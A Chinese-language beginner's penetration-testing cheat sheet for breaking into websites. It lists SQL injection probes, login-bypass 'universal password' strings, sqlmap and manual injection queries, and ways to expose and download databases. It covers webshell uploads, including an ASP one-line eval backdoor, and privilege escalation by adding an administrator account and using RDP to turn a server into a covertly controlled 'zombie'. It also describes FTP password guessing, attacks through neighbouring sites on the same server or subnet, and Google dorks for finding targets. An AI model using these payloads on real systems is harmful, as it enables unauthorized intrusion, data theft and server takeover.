初级渗透测试

1、〓经典注入〓

通常,判断一个网站是否存在注入点,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断,如果and 1=1正常返回页面,1=2错误,或者找不到,那么就存在注入点 

2、〓万能密码OR漏洞〓

万能密码'or'='or',可以用在后台管理输入,有的网站由于没有过滤OR漏洞,输入OR直接就可以突破,一般漏洞存在于ASP类型的网站 

###常见万能密码

基本密码

admin     admin                admin     admin888

asp aspx万能密码

1:"or "a"="a                  2: ')or('a'='a
3:or 1=1--                    4:'or 1=1--
5:a'or' 1=1--                 6:"or 1=1--
7:'or'a'='a                   8:"or"="a'='a
9:'or''='                     10:'or'='or'
11: 1 or '1'='1'=1             12: 1 or '1'='1' or 1=1
13: 'OR 1=1%00                 14: "or 1=1%00
15: 'xor
16: 新型万能登陆密码
   用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)
   密码 1 
   Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
   Password=1
17..admin' or 'a'='a 密码随便

PHP万能密码

'or'='or'                         'or 1=1/*  字符型 GPC是否开都可以使用
 User: something
 Pass: ' OR '1'='1

jsp 万能密码

1'or'1'='1                        admin' OR 1=1/*
用户名:admin    系统存在这个用户的时候 才用得上
密码:1'or'1'='1

万能密码得于利用 全归功于以下的OR 和程序员所编写的程序

  • and逻辑运算的结果:真—-真===真;假—-真===假; 真—-假===假; 假—-假===假.

  • or逻辑运算的结果:真—-真===真;假—-真===真; 真—-假===真; 假—-假===假.

3、〓爆库〓

爆库,可以理解为爆出数据库下载,用爆库之类的工具可以直接就获得管理员用户和密码,%5C为十六进制的\符号,而数据库大于5.0就可以进行爆库,如在PHP手工高级注入时,用VERSION()这个变量猜出网站数据库版本,如果一个网站数据库大于5.0,且是ACESS数据库,那么提交地址是:http://www.xxx.com/rpc/show24.asp?id=127,我们直接把%5C加到RPC后面,因为%5C是爆二级目录,所以应该是这样,http://www.xxx.com/rpc%5c/show24.asp?id=127,而%23是代表#,如果管理员为了防止他人非法下载数据库,而把数据库改成#database.mdb,这样防止了,如果页面地址为 http://www.xx.com/rpd/#database.mdb,是这样的,那么我们把%23加到替换#,http://www.xx.com/rpd/%23database.mdb 

4、〓COOKIE中转,SQL防注入程序,提醒你IP已被记录〓

COOKIE中转,SQL防注入,如果检测一个网站时,弹出这样一个对话框,上面出现SQL防注入程序提醒的字语,那么我们可以利用COOKIE中转,注入中转来突破,方法是先搭建一个ASP环境(且网站为ASP网站),然后打开中转工具,记住一个网站的页面地址粘贴进工具里,值是多少就写多少,生成,把生成的文件放到目录里,接下来,打开网页,输入 http://127.0.0.1:(端口)/目录里文件,如果正常,那么输入 http://127.0.0.1:端口/值(目录文件)?提交值,那么拿到工具里猜表名,列名了

cookie注入可以使用cookie注入中转工具、手工和sqlmap三种方法

cookie 注入中转
http://tiannanyi.blog.163.com/blog/static/187359344201352052954459/

例如目标网址为http://www.xxx.com/otype.asp?id=1,对于cookie注入中转生成器工具的使用,在注入url处和来源页填入http://www.xxx.com/otype.asp,而在注入键名输入id=,cookies处填入登录网页的cookies值,在post提交值改为1,选择生成asp即可。搭建一个ASP环境(且网站为ASP网站),把生成的asp文件放入搭建的目录,输入 http://127.0.0.1:(端口)/目录里文件即可访问,然后用啊D、明小子等即可注入

cookie手工注入 http://www.2cto.com/Article/201202/118837.html

1.寻找形如“.asp?id=xx”类的带参数的URL。
2.去掉“id=xx”查看页面显示是否正常,如果不正常,说明参数在数据传递中是直接起作用的。
3.清空浏览器地址栏,输入“javascript:alert(document.cookie="id="+escape("xx"));”,按Enter键后弹出一个对话框,内容是“id=xx”,然后用原来的URL刷新页面,如果显示正常,说明应用是用Request("id")这种方式获取数据的。
4.重复上面的步骤,将常规SQL注入中的判断语句带入上面的URL:“javascript:alert(document.cookie="id="+escape("xx and 1=1"));”“javascript:alert(document.cookie="id="+escape("xx and 1=2"));”。和常规SQL注入一样,如果分别返回正常和不正常页面,则说明该应用存在注入漏洞,并可以进行cookie注入。
5.使用常规注入语句进行注入即可。

sqlamp注入 http://www.cnblogs.com/Apple010/p/4933545.html

如果目标网址为:http://www.xxx.com/otype.asp?id=1
1、sqlmap.py -u "http://www.xxx.com/otype.asp" --cookie "id=1" --current-db --level 2

sqlmap的重要性大家想必也明白,对于它的学习其实也挺重要的

5, 〓手工〓

ASP手工语句

表名 and exists (select * from 表名) 
列名 and (select count(列名) from 表名)>0 
长度 and (select top 1 len(username) from admin)>0
内容 and (select top 1 asc(mid(username,1,1)) from admin)>100

PHP手工语句

order by(猜字段)     and 1=2 union select (字段数)
and 1=2 union selsect from(位置) 
如果有30个字段,那么就应该在注入地址后输入 http://www.xxx.com/showfo.jsp?id=130 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28.29,30
几个常用变量 ,USER(),VERSION()<数据库版本),database()<数据库名称> 

6、〓抓包拿WEBSHELL〓

如果进入后台发现,点数据库备份的时候发现找不到,可以通过抓包来获得上传,拿到WEBSHELL,工具WOSCK抓包,一张图片,一个ASP马,自行搭建一个上传地址,UPLOAD加载,UPFILE上传,COOKIS=( ) 

7、〓数据库备份拿WEBSHELL和一句话木马入侵〓

通常进入后台了,发现有数据库备份,拿WEBSHELL吧,找一个添加产品的地方,传一个大马,格式为JPG图片,然后把图片地址粘贴到数据库备份那里,给起个名字,如SHELL.ASP,然后合地址访问的时候就进入webshell了,一句话木马入侵,先编辑记事本,加入一句话,改为2.jpg,然后备份,访问,发现500内部服务器错误,证明一句话成功,接下来用一句话木马客户端连接,得到路径页面,然后改下马名,输入大马内容,提交,得到WEBSHELL

8、〓DB权限差异备份拿WEBSHELL〓

如果一个网站注入点是MYSQL数据库,且是DB权限,或者是SA权限,能够列目录,那么就好办了,找到网站的目录,目录通常在D和E盘,备份个小马,合地址访问看看成功没,直接备份大马貌似不行,成功后,再输入大马内容,拿到WEBSHELL

9、〓找后台〓

找后台,一般默认为admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp,login.asp,logon,user.asp,admin/index.asp,当然,这只是默认,一些大网站不可能还用admin作为后台,有的隐藏很深,可以简单用site:网站 inurl:后台来猜,或者下载源HTML文件分析找出后台,或者用各种工具(御剑、wvs等)来扫描了,方法很多的 

10、〓脚本提示〓

有的网站要求进入后台会出现一个脚本提示,就像VB编程里INPUTBOX “”,一个对话输入框,我们输入administrator突破,admin代表以管理员身份来进入 

11、〓php后门和EWEBEDITOR编辑器入侵〓

PHP后门,如之前爆出的DISZ漏洞,在一个PHP网站后面加C.PHP,如果出现1,那么传个PHP马就拿到WEBSHELL,EWEBEDITOR编辑器入侵,是很快速的方式,设置好上传文件类型,传ASA,或者其他的格式,然后访问拿到WEBSHELL,如没有直接加语句拿到WEBSHELL

12、〓上传漏洞〓

有的网站虽然没有注入点,但存在一个上传漏洞,那么我们如何来利用了,首先,打开上传地址看是否存在,如果有,试想传一个ASP大马是不行的,那么传一句话看看,先看能成功不,用明小子来上传,动网,动力,动感,乔客4种方式,页面地址格式要对应,如果一个网站地址弹出对话框,显示上传成功,那么证明可以拿到WEBSHELL,传马,另外有的没有任何显示,直接空的,那么可以构建两个上传,第一个传JPG的图片,第二个传ASP马(大马),记住,大马后面要有个空格才行,如果一个网站地址出现文件类型不正确,请重新上传,那么证明%90可以拿到WEBSHELL,只是格式不对,不允许,改后缀,只要是网站没有过滤的格式,如果一个网站地址显示请登陆再上传,那么证明没有拿到COOKIS,思路是在该网站注册一个用户,得到COOKIS,然后上传就成功了 

13、〓简单提权拿下服务器和SERV提权和pcanywhere三方提权〓

简单拿下服务器,也就是拿下网站IP主机,首先我们需要一个WEBSHELL,然后看看组件信息,看看路径可读可以写不,如果有一个可以,那么来到CMD命令下,首先输入可写的文件内容,执行命令加一个帐号和最高管理权限,然后输入netstat -an,得到主机连接端口,然后用3389连接进入,让其成为肉鸡(最好),这样比较隐蔽我们操作 

14、〓反查入侵和旁注和社会工程学〓

反查IP入侵,也就是入侵21端口,首先我们入侵网站先PING WWW.XXX.COM ,出IP,然后到反查IP站点查挂了多少个域名,接下来,添加webmaster@地址,加入字典,(里面多收集可能的口令,如123,321,456),然后用流光探测密码,登陆 ftp://ip,输入用户和密码,改掉信息等等,社会工程学X-WAY,来得到FTP密码,也需要收集,并不是每个都行,总之是自己的经验 

15、〓跨站脚本攻击〓

跨站(CSS),被动攻击,现在需要更多的思路和经验了 

16、〓特殊空格〓

利用TAB制作的特殊空格,然后注册时输入空格,加管理名字,随便在网站上找个斑竹,或者管理的名字,这样来注册,有时自己注册的这个也会变成管理员 

17、〓c段 旁注〓

有时候我们渗透一个网站的时候发现没有什么漏洞,那么可以考虑考虑c段和旁注,有时候在我们没有思路的时候的时候这两个方面还是对我们有一些思路。

c段

比如在:127.127.127.4 这个IP上面有一个网站 127.4 这个服务器上面有网站我们可以想想..他是一个非常大的站几乎没什么漏洞!但是在他同C段 127.127.127.1~127.127.127.255 这 1~255 上面也有服务器而且也有网站并且存在漏洞,那么我们就可以来渗透1~255任何一个站,之后提权来嗅探得到127.4这台服务器的密码,甚至3389连接的密码后台登录的密码,如果运气好会得到很多的密码…

旁注

比如你要入侵A网站,但是在A网站上找不到漏洞!你可以选择和A网站同一服务器下的B网站,C网站寻找漏洞。上传漏洞也好,SQL注入也好,拿到webshell后提升权限,在服务器上找到A网站的目录

旁注的过程

1.利用工具或者网站WHOIS你所要攻击的目标资料,得到关于网站的域名注册信息以及主机是否是虚拟主机的确定,因为这样子才可以从旁注入。
2.看服务器上面的所有网站程序,要理解熟悉每个程序的编写以及程序的功能(可以整天去源码站看源码,这样子你就会懂得如何去分别程序了) 
3.利用现在所流行的所有漏洞来得到webshell 
4.查看主机所开放的系统服务(这个办法是为了得到我们所要得到目标网站的路径)例如:Serv-u的用户配置文件(不是用来提升权限)IIS的用户配置文件(会泄漏大量用户路径的)杀毒软件的LOG(这个可是可遇不可求的) 
5.在尽量不接触网站服务器的Admin权限下入侵(为了避免造成不必要的麻烦)) 
6.建议使用两只以上的ASP木马

18、〓 GOOGLE BACK语句〓(很多)

利用谷歌hack可以搜索出我们想要的地址,达到事半功倍的效果
inurl:asp?id= ,inurl:show.asp ,inurl:went.asp ,inurl:jsp?id=,inurl:php?id= 

19、非CMS获取Webshell方法:

1、数据库备份获取webshell;
2、抓包上传获取webshell;
3、Sql命令获取webshell;
4、模板修改获取webshell;
5、插入一句话获取webshell;(注意必须和前面的语句闭合)  插入asp一句话:"><%eval pequest("pass")%><%'
6、修改上传类型获取webshell;